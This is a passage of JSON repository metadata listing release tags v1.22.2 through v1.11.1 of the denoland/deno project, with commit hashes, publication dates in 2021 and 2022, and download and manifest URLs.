url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.